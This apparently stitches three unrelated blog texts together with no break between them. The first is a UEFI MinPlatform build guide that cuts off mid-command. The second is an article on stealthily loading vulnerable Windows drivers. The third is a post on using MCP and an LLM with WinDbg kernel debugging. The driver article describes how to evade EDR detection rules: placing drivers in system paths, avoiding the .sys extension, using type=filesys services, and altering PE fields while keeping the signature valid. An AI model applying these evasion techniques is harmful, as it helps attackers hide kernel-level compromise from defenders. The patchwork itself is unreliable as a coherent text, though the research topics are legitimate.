https://github.com/tianocore-training/PlatformBuildLab_MinPlatform_FW/blob/master/FW/MinPlatformBuild/Platform_Build_MinPlatform_Win_Lab.pdf You can see within the GitHub Intel/tianocore-training repository a ton of tutorial material on UEFI; it’s well worth spending some time here learning, if you have technical interest. You’ll want to obtain a copy of Visual Studio 2019 as well as Git Bash on your local Windows PC build machine. On that build machine, launch Git Bash and type in the following, essentially downloading with tag edk2-stable202108: $ cd c:$ mkdir fw$ cd fw$ mkdir UpX$ cd UpX$ git clone https://github.com/tianocore/edk2.git$ cd edk2$ git checkout 7b4a99be8a39c12d3a7fc4b8db9f0eab4ac688d5$ git submodule update –init$ cd .. Then download edk2-platforms with the August 2021 tag: $ git clone https://github.com/tianocore/edk2-platforms.git$ cd edk2-platforms$ git checkout 40609743565da879078e6f91da76fc58a35ecaf7$ cd .. Finally download the edk2-non-osi and FSP repositories: $ git clone https://github.com/tianocore/edk2-non-osi.git$ git clone https://github.com/Intel/FSP.git At this point, the UpX directory should have four subdirectories: edk2, edk2-non-osi, edk2-platforms, and FSP. You’ll also want to download the ASL compiler and NASM assembler to complete the build. They can be obtained here: https://github.com/tianocore-training/Presentation_FW/blob/main/FW/Presentations/Lab_Guides/_E_05_Platform_Build_MinPlatform_Win_Lab_Guide.md. Now, it’s time for the build. Launch the Developer Command Prompt for VS 2019 from a CMD line, and change to the Min Platform Build directory: $ cd c:\Fw\UpX\edk2-platforms\Platform\Intel You’ll need to do this build with Python 3.8 (sic) on your PC. Once this is installed and set up, fire off the build: $ python build_bios.py -p UpXtreme -t VS2019 And, voila, in a few minutes, you’ll have all that you need. The complete 2021 release folder is 2.91GB in size, and holds 48,883 files, with 6,812 folders. In zipped form, it is 1.45GB. Note that in the folder: c:\fw\UpX\Build\WhiskeyLakeOpenBoardPkg\UpXtreme\DEBUG_VS2019\FV is the 6,848kB UPXTREME.fd file. We’ll refer to this file in a follow-up article in the series; it is the binary file that we’ll be flashing onto the AAEON UP Xtreme target. You’ll have noted that we built this with the 2021 stable release commit hash for WhiskeyLakeOpenBoardPackage. This boots on the AAEON UP Xtreme board – at least, it boots on mine. This might change in the future if the AAEON hardware board changes in any way incompatibly with this build. For the purpose of this study, we’ll also need to do a build with today’s most stable release commit hash. This can be done by repeating the commands above, but this time just omit the two lines: $ git checkout
Discreet Driver Loading in Windows
In the first part of this series, we explored the methodology to identify vulnerable drivers and understand how they can expose weaknesses within Windows. That foundation gave us the tools to recognize potential entry points. In this next stage, we will dive into the techniques for loading those drivers in a stealthy way, focusing on how to integrate them into the system without triggering alarms or leaving obvious traces. This chapter continues building on the research path, moving from discovery to discreet execution. The .sys File and Normal Loading A Windows driver is usually a .sys file, which is just a Portable Executable (PE) like an .exe or .dll, but designed to run in Kernel Mode. It contains code sections, data, and a main entry point called DriverEntry, executed when the system loads the driver. Drivers are normally installed with an .inf file, which tells Windows how to set them up. During installation, the system creates a corresponding entry in the Registry under: HKLM\SYSTEM\CurrentControlSet\Services\<DriverName> This entry defines the location of the .sys file (typically in System32drivers), and when it should start (boot, system, or on demand). How an EDR Detects Malicious Driver Loads and the Telemetry Involved Drivers in Windows operate in kernel mode, which grants them the highest level of privileges on the system. This makes them a prime target for attackers looking to hide processes, escalate privileges, or bypass security defenses. One of the most common tactics seen in advanced attacks is the loading of malicious or vulnerable drivers, a technique that allows adversaries to gain control at the deepest layer of the operating system. To counter this, an EDR solution continuously monitors system activity, gathering telemetry that helps uncover suspicious driver behavior. Detection is not based on a single signal, but on the correlation of multiple events, such as process activity, registry modifications, certificate validation, and kernel-level actions. Malicious drivers are usually introduced in a few key ways. Attackers may attempt to load unsigned drivers or use stolen and revoked certificates to trick the system into accepting them. Another common approach is known as Bring Your Own Vulnerable Driver (BYOVD), where a legitimate but flawed driver is installed and then exploited to run arbitrary code in kernel space. Drivers can also be manually loaded using system tools or APIs like NtLoadDriver, sometimes disguised as administrative tasks. Because of these attack vectors, EDR platforms pay close attention to four core areas of telemetry: System Events: Logs that show when drivers are loaded, installed, or modified (for example, Sysmon Event ID 6 for driver load events). Image Load Notifications: EDR driver registers for image loads, which includes drivers (with PsSetLoadImageNotifyRoutine). Process and Service Monitoring: Detection of new kernel-level services, unexpected calls to driver-loading APIs, or unusual use of utilities like sc.exe or drvload.exe. Digital Signature Validation: Checking whether the driver is properly signed, and flagging issues such as missing signatures, revoked certificates, or suspicious publishers. By gathering and correlating these signals, an EDR can quickly spot when a driver does not behave like a legitimate one, raising an alert before the attacker gains full control of the system. Detection Rules Let’s start by looking at some of the most well-known detection rules used to identify malicious drivers. The previously presented rules flag driver loads originating from atypical file paths. This heuristic is trivial to circumvent: an adversary can install the driver under a standard system directory (for example, C:\Windows\System32\drivers), where simple path-based detections will likely fail. This is easy to fix, and even if that specific alert didn’t fire, an EDR tracks every driver loaded on the system. Dropping our drivers into a normal path won’t make us magically stealthy. Both rules rely on the .sys file extension as an indicator of driver files. Consequently, using an alternative extension (for example, .exe) would bypass those specific checks. However, can a driver actually be loaded from a file whose extension is not .sys? Indeed, it is possible to load a driver using a file that does not have a .sys extension. A frequently used detection rule flags the creation of services with type=kernel when performed via the sc.exe command-line tool. Below is an example: This is more difficult to bypass because sc.exe typically requires type=kernel to load a kernel-mode driver. According to Microsoft documentation, there is an alternative service type (type=filesys) for file system drivers. Digital Signature A digital signature for a Windows driver is a cryptographic mark that confirms both the authenticity and integrity of the driver. In other words, it tells Windows that the driver really comes from the stated manufacturer and hasn’t been altered since it was signed. Without this signature, Windows may block the driver from being installed. The process starts with the developer creating the driver. Before distribution, the driver is signed using a certificate issued by a trusted certificate authority. This certificate contains a private key used to create the signature, which Windows can later verify using the corresponding public key. During installation, Windows checks the signature and ensures that it is valid and trusted. If any part of the driver is modified after signing, the signature becomes invalid, and Windows will warn the user or prevent installation. Well, that’s the theory. In practice, however, there have been ways to modify a driver’s hash without affecting its digital signature. In other words, the driver remains signed and appears trustworthy. As can be seen in the following image, there are several fields that are excluded during the hash calculation process. This is not only possible with .sys files, but can also be done with any PE (Portable Executable), such as .exe or .dll files. Let’s look at some examples: In these examples, we will modify the Checksum field of a PE file. But before we begin, what exactly is a checksum? When the Portable Executable (PE) format was created, network connections were far less reliable than they are today, making file corruption during transfer a common problem. This was especially risky for critical files like executables and drivers, where even a single-byte error could crash the system.
Using MCP for Debugging, Reversing, and Threat Analysis: Part 2
In Part 1 of this article series, I demonstrated the configuration steps for using natural language processing in analyzing a Windows crash dump. In this blog, I dive far deeper, using vibe coding to extend the use of MCP for Windows kernel debugging. Part 1 of this blog series built upon the work developed by Sven Scharmentke, who wrote the fascinating article entitled The Future of Crash Analysis: AI Meets WinDBG. His GitHub repository, mcp-debug, contains the code that uses AI to analyze Windows crash dumps and perform user-space debugging using Microsoft’s “CDB” utility. Specifically, it uses Model Context Protocol (MCP) as an interface with an LLM and GitHub Copilot to do some amazing things: taking debugging into the 21st century, and eliminating the arcane command set tribal knowledge of the WinDbg utilities that are the purview of very few deeply experienced engineers. This is groundbreaking material: it makes advanced technology, akin to magic, much more accessible to the many, not just the few. As I tinkered with Sven’s code, I began to wonder: could it be extended to accommodate deep Windows kernel interactive debugging as well? In my previous work, I used JTAG extensively to explore the kernel using ASSET’s SourcePoint product on a remote AAEON UP Xtreme i11 Tiger Lake board. This is a very powerful combination. But SourcePoint has a learning curve as well, and although it has many advantages, it lacks some of the capabilities of the Microsoft WinDbg kernel debugging tool; what if I could combine the power of WinDbg with natural language processing via LLMs to dig even deeper into the kernel? Here’s a picture of what I am trying to do: The host PC is running GitHub Copilot within VS Code, with a connection to Claude Sonnet 4.5; and MCP is being used to convert natural language into specific WinDbg/KD commands sent to the target, extending our debugging capabilities for kernel research. You might still ask, what’s the point? Well, this would give researchers enormous power for kernel debugging and vulnerability research. Image being able to use plain language to explore the rogue driver code as documented in some of our blog articles, such as Methodology of Reversing Vulnerable Killer Drivers by Ivan Cabrera and Understanding Out-Of-Bounds in Windows Kernel Drivers by Jay Pandya. The possibilities are endless. Of course, this is a prodigious undertaking (otherwise someone else would have probably done it already). Combine that with Sven’s use of the Python programming language, with which I’m not currently all that familiar with. But I decided to jump in with both feet; and Python is also the language of AI, so it’s a great learning experience. That’s where the vibe coding came in. There’s nothing like getting totally hands-on and going in over your head to force us to learn! So, I began. First of all, it was important to understand the overall structure of the source in Sven’s mcp-windbg repository. The main body of the code revolves around two files: server.py, which sets up and tears down resources for the debugging sessions and crashdumps, runs WinDbg commands, etc.; and cdb_session.py, that manages the CDB sessions, sending commands, waiting for commands to finish and triggering on prompts, etc. I quickly realized that CDB and KD (the kernel debugger I would be using) are very different in operation. I’d have to extend the functionality of server.py to accommodate how KD sessions are set up, which is quite different; and a new kd_session.py would be needed to continuously read the KD debugger’s output (which is unique), wait for prompts, send commands, etc. Sounds simple, right? Well, it wasn’t, as you’ll see. Starting with the server, I created an additional function to mirror the existing get_or_create_session(), named get_or_create_kd_session, solely for the purpose of managing kernel debugging sessions, and assume the target is remote and accessible via TCP/IP: I also had to add a few tools: See that send_break tool above? That was an early attempt at addressing one of the fundamental differences between a kernel and userland debugging session. The KD application first establishes a connection to a remote KDNET agent running on the target; and then one must reset the target in order to break in. What this looks like is that when the target is in a Running state, and you do an open_windbg_kernel, you get this out this text via stdio: PS C:\Users\alans> kd -k net:port=50000,key=cja5yc9a64kf.2hmf45lejxq8z.3or47kcoz7uc4.3a6e8x9lpigeo************* Preparing the environment for Debugger Extensions Gallery repositories ************** ExtensionRepository : Implicit UseExperimentalFeatureForNugetShare : true AllowNugetExeUpdate : true NonInteractiveNuget : true AllowNugetMSCredentialProviderInstall : true AllowParallelInitializationOfLocalRepositories : true EnableRedirectToV8JsProvider : false — Configuring repositories —-> Repository : LocalInstalled, Enabled: true —-> Repository : UserExtensions, Enabled: true>>>>>>>>>>>>> Preparing the environment for Debugger Extensions Gallery repositories completed, duration 0.015 seconds************* Waiting for Debugger Extensions Gallery to Initialize **************>>>>>>>>>>>>> Waiting for Debugger Extensions Gallery to Initialize completed, duration 0.360 seconds —-> Repository : UserExtensions, Enabled: true, Packages count: 0 —-> Repository : LocalInstalled, Enabled: true, Packages count: 29Microsoft (R) Windows Debugger Version 10.0.26100.6584 AMD64Copyright (c) Microsoft Corporation. All rights reserved.Using NET for debuggingOpened WinSock 2.0Kernel Debug Target Status: [no_debuggee]; Retries: [0] times in last [7] seconds.Waiting to reconnect…Connected to target 192.168.68.55 on port 50000 on local IP 192.168.68.81.You can get the target MAC address by running .kdtargetmac command. And then you need to go over to the target and manually reset it, typically with “shutdown -r -t 0” from a CMD window. Then you get a bunch more text in immediately: Connected to Windows 10 26100 x64 target at (Tue Nov 11 14:34:36.979 2025 (UTC – 6:00)), ptr64 TRUEKernel Debugger connection established.Symbol search path is: srv*Executable search path is:Windows 10 Kernel Version 26100 MP (4 procs) Free x64Product: WinNt, suite: TerminalServer SingleUserTSEdition build lab: 26100.1.amd64fre.ge_release.240331-1435Kernel base = 0xfffff800`7f200000 PsLoadedModuleList = 0xfffff800`800f4f10Debug session time: Tue Nov 11 14:34:54.996 2025 (UTC – 6:00)System Uptime: 0 days 0:14:04.732Shutdown occurred at (Tue Nov 11 14:34:39.868 2025 (UTC – 6:00))…unloading all symbol tables.Using NET for debuggingOpened WinSock 2.0Waiting to reconnect…Connected to target 192.168.68.55 on port